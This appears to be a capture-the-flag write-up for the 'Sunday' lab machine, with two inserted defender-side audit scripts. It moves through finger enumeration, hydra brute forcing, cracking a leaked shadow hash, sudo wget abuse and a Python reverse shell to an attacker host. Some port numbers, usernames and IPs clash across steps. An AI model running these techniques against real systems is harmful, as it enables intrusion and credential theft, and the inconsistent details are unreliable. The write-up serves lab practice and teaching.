Sunday

Reconnaissance: NMAP

-sC: run default nmap scripts
-sV: detect service version
-O: detect OS
-oA: output all formats and store in file initial
--max-retries: number of port scan probe retransmissions

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.76 

79/tcp    open     finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where

111/tcp   open     rpcbind     2-4 (RPC #100000)

515/tcp   open     printer

2111/tcp  filtered kx

4126/tcp  filtered ddrepl

32769/tcp filtered filenet-rpc

49159/tcp filtered unknown

56738/tcp filtered unknown

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.76

111/udp open  rpcbind

Device type: general purpose|storage-misc
Running: illumos OpenIndiana, Joyent SmartOS, Nexenta, Oracle Solaris 10|11, Sun embedded, Sun OpenSolaris, Sun Solaris 11

OS CPE: cpe:/o:illumos:openindiana cpe:/o:joyent:smartos cpe:/o:nexenta:nexenta cpe:/o:oracle:solaris:10 cpe:/o:oracle:solaris:11 cpe:/h:sun:storage_7410 cpe:/o:sun:opensolaris cpe:/o:sun:sunos:5.11
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.76

We get back the following result showing that 2 ports are open:
Port 79: running Sun Solaris fingerd
Port 111: running rpcbind

┌──(kali💀kali)-[~]
└─$ nmap -p- 10.10.10.76  --max-retries 0

--max-retries: number of port scan probe retransmissions

Then we run a more comprehensive scan to identify services running on the above ports.

┌──(kali💀kali)-[~]
└─$ sudo nmap -p 79,111,49159,56738 -sV 10.10.10.76

We get back the following result showing that:
Port 22022: is running SunSSH 1.3
Port 55029: is running a service that nmap was not able to identify

Enumeration: Port 79 TCP finger Sun Solaris

We’ll start off by enumerating port 79. A quick Google search for the “Finger service” tells us that the finger protocol is used to find out information about users on a remote system; therefore, we can use it to enumerate usernames.

First, check if there are any logged in users.

┌──(kali💀kali)-[~]
└─$ finger @10.10.10.76
No one logged on

No one is currently logged in. Let’s check if the user “root” exists.

┌──(kali💀kali)-[~]
└─$ finger root@10.10.10.76
Login       Name               TTY         Idle    When    Where
root     Super-User            ssh          <Dec  7 01:27> 10.10.14.46  

It does exist. Now, let’s enumerate more usernames. First we need a list of usernames that we can use in order to guess the usernames that are available on the server.

┌──(kali💀kali)-[~]
└─$ locate names.txt 
/usr/share/seclists/SecLists-master/Usernames/Names/names.txt

Pentestmonkey has a script that is used to enumerate OS-level user accounts via the finger service. Let’s run that on our host.

┌──(kali💀kali)-[~/Desktop/finger-user-enum-1.0]
└─$ ./finger-user-enum.pl -U /usr/share/seclists/SecLists-master/Usernames/Names/names.txt -t 10.10.10.76

######## Scan started at Fri Jan  5 01:58:41 2024 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..dhcpserv DHCP Configuration A               < .  .  .  . >..ikeuser  IKE Admin                          < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
ike@10.10.10.76: ikeuser  IKE Admin                          < .  .  .  . >..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann                   ???..jo                    ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela                  ???..miof                  ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7 01:27> 10.10.14.46         ..
sammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sys@10.10.10.76: sys             ???                         < .  .  .  . >..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Fri Jan  5 02:36:50 2024 #########
15 results.

-U: file of usernames to check via finger service
-t: server host running finger service

We get the following result showing us that “sammy” and “sunny” are users of the system.

Enumeration: Port ???? TCP SunSSH 1.3

User Shell: SSH as sunny

Since SSH is open and we have two valid usernames, let’s try brute-forcing the users’ credentials using hydra. We’ll start off with Sunny.

┌──(kali💀kali)-[~]
└─$ hydra -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.10.10.76 ssh -s 22022

-l: username
-P: password file
-s: port

We get back the following result showing us that Sunny’s password is “sunday”.

SSH into Sunny’s account.

┌──(kali💀kali)-[~]
└─$ ssh -p 22022 sunny@10.10.10.76
sunday

sunny@sunday:~$ ls
local.cshrc    local.login    local.profile

sunny@sunday:~$ find / -name  user.txt 2>/dev/null
/home/sammy/user.txt

sunny@sunday:~$ cat /home/sammy/user.txt
cat: cannot open /home/sammy/user.txt: Permission denied

We need to escalate our privileges to Sammy.

Privesc: sunny to sammy

Run the following command to view the list of allowed commands that the user can run with root privileges.

sunny@sunday:/home/sammy$ sudo -l
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll

We can run the /root/troll command as root. This is obviously a custom command so let’s run it to see what it’s doing (we don’t have read access to it).

sunny@sunday:/home/sammy$ sudo /root/troll
testing
uid=0(root) gid=0(root)

It seems to be a script that prints the id of the user running it. Since we ran it with the ‘sudo’ command, it prints the id of root. We don’t have write access to the script, so we can’t escalate our privileges using it. After a bit of digging, I found the following backup directory.

It contains two files, agent22.backup and shadow.backup. The former we don’t have access to; however, we can view the latter.

sunny@sunday:/home/sammy$ cd /backup
sunny@sunday:/backup$ ls
agent22.backup  shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

It’s a backup of the shadow file. We already know Sunny’s password so we’re not going to attempt to crack it. Instead, copy Sammy’s password and save it in the file sammy-hash.txt. Then use John to crack the hash.
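As an added defender-side example (not from the original writeup), the script below triages a shadow-format dump like the one above: it tells apart locked (*LK*), Solaris no-password (NP) and live hashed entries, identifies the crypt scheme ($5$ is SHA-256 crypt), and lists the accounts whose credentials must be rotated once such a backup is found readable. The input is constructed from the shadow.backup shown on this page.

```python
import re

# Shadow-format dump constructed from the /backup/shadow.backup shown above.
SHADOW_BACKUP = """\
mysql:NP:::::::
openldap:*LK*:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# crypt(3) scheme identifiers; "$5$" is SHA-256 crypt, as in the dump above.
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

def classify(field):
    """Map a shadow password field to (state, scheme)."""
    if field == "":                    # empty: login without any password
        return ("empty", None)
    if field == "NP":                  # Solaris: no password, non-login account
        return ("nologin", None)
    if field.startswith(("*", "!")):   # *LK*, *, !...: locked / unusable
        return ("locked", None)
    m = re.match(r"^\$([^$]+)\$", field)
    if m:
        return ("hashed", CRYPT_IDS.get(m.group(1), "unknown"))
    return ("hashed", "descrypt")      # legacy 13-character DES crypt

def triage(shadow_text):
    """Return {user: (state, scheme)} for every entry in a shadow-format dump."""
    result = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0] or line.startswith("#"):
            continue
        result[fields[0]] = classify(fields[1])
    return result

def needs_rotation(shadow_text):
    """Accounts the leak really exposes: live hashes (crackable offline with
    john, as below) and empty fields (usable with no credential at all)."""
    return sorted(user for user, (state, _) in triage(shadow_text).items()
                  if state in ("hashed", "empty"))

if __name__ == "__main__":
    for user, (state, scheme) in triage(SHADOW_BACKUP).items():
        print(f"{user:10} {state:8} {scheme or ''}")
    print("rotate:", needs_rotation(SHADOW_BACKUP))
```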

┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sammy-hash.txt

cooldude!        (?)    

We got a password! Let’s su into Sammy’s account.

sunny@sunday:/backup$ su - sammy
Password: 
Oracle Solaris 11.4.42.111.0                  Assembled December 2021
-bash-5.1$ whoami
sammy

Now we can view the user.txt flag.

-bash-5.1$ cat user.txt
0f17c---------------------------

Privesc: sammy to root

Let’s try to escalate to root privileges. Run the sudo command again to view the list of allowed commands the user can run as root.

-bash-5.1$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

We can run wget with root privileges! The “-i” flag tells wget to read a list of URLs from a file, and since it echoes each line while trying to fetch it, pointing it at any file prints that file’s content. Therefore, we can run the following command to read the root flag.

-bash-5.1$ sudo wget -i /root/root.txt
--2024-01-05 07:23:00--  http://57361888a50a9652272159ed775c6b74/
Resolving 57361888a50a9652272159ed775c6b74 (57361888a50a9652272159ed775c6b74)... failed: temporary name resolution failure.
wget: unable to resolve host address ‘57361888a50a9652272159ed775c6b74’
-bash-5.1$ 

However, in this scenario we’re simply reading the content of the flag and not really escalating privileges. To get a root shell we need to chain the following two vulnerabilities:

  1. The user Sunny can execute the /root/troll file with root privileges, and

  2. The user Sammy can overwrite any root owned file using the wget command.

Therefore, we’ll use Sammy’s sudo privileges to overwrite the /root/troll file and include a shell in it. Then we’ll use Sunny’s sudo privileges to run the /root/troll file and convert our shell to a root shell.
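A defender-side check for the two sudoers weaknesses just described, added here as an example and not part of the original writeup: it parses `sudo -l` output (the two listings shown above, embedded as constructed input), flags root-runnable file-writing binaries and ad-hoc root scripts, and reports the write-then-execute chain between two different users.

```python
import re
# `sudo -l` output for both users, constructed from the results shown above.
SUDO_L = {
    "sunny": """User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll
""",
    "sammy": """User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
""",
}

# Binaries that read or write arbitrary files when run as root (small subset).
FILE_WRITERS = {"wget", "curl", "cp", "tee", "dd", "mv", "tar"}
CUSTOM_DIRS = ("/root/", "/home/", "/tmp/", "/opt/")   # likely ad-hoc scripts
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_rules(text):
    """Turn a `sudo -l` listing into [{runas, nopasswd, cmd}] (header skipped)."""
    rules = []
    for line in text.splitlines()[1:]:
        m = RULE.match(line)
        if m:
            rules.append({"runas": m["runas"], "nopasswd": "NOPASSWD" in m["tags"], "cmd": m["cmd"]})
    return rules

def audit(sudo_outputs):
    """Return sorted (severity, user, message) findings, including the
    write-as-root / execute-as-root chain between two different users."""
    findings, writers, custom = [], [], []
    for user, text in sudo_outputs.items():
        for rule in parse_rules(text):
            cmd, as_root = rule["cmd"], rule["runas"] in ("root", "ALL")
            if not as_root:
                continue
            if cmd == "ALL":
                findings.append(("high", user, "unrestricted sudo: (ALL) ALL"))
            elif cmd.split()[0].rsplit("/", 1)[-1] in FILE_WRITERS:
                findings.append(("high", user, f"{cmd} as root can write any file (e.g. -O)"))
                writers.append(user)
            elif cmd.startswith(CUSTOM_DIRS):
                findings.append(("medium", user, f"custom script {cmd} runs as root"))
                custom.append((user, cmd))
    for w in writers:
        for u, cmd in custom:
            if u != w:
                findings.append(("critical", f"{w}->{u}", f"{w} can overwrite {cmd}, which {u} runs as root"))
    return sorted(findings)
```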

Alright, let’s do this! In the attack machine, create a file called “troll” and add the following code to it.

#!/usr/bin/python

import socket
import subprocess
import os

# Connect back to the listener on the attack machine
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.5", 443))
# Point stdin, stdout and stderr of this process at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn an interactive shell that inherits the redirected descriptors
subprocess.call(["/bin/sh", "-i"])

Then start up a simple Python server in the directory the file is in.

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555

Go back the target machine running with the Sammy user privileges, and run the wget command to overwrite the /root/troll file.

-bash-5.1$ sudo wget -O /root/troll http://10.10.16.4:5555/troll
--2024-01-05 07:28:10--  http://10.10.16.4:5555/troll
Connecting to 10.10.16.4:5555... connected.

bash-5.1$ sudo wget http://10.10.16.4/shell.py -O /root/troll
--2024-01-05 07:39:33--  http://10.10.16.4/shell.py
Connecting to 10.10.16.4:80... connected.

In another SSH session running with the Sunny user privileges, execute the troll file. Since the troll file now contains our reverse shell and is executed with root privileges, we get a root shell!

bash-5.1$ sudo /root/troll
Password: 

Note: Something on the server seems to be resetting the /root/troll file every couple of seconds, so there is only a small window of time between overwriting the troll file as Sammy and executing it as Sunny.
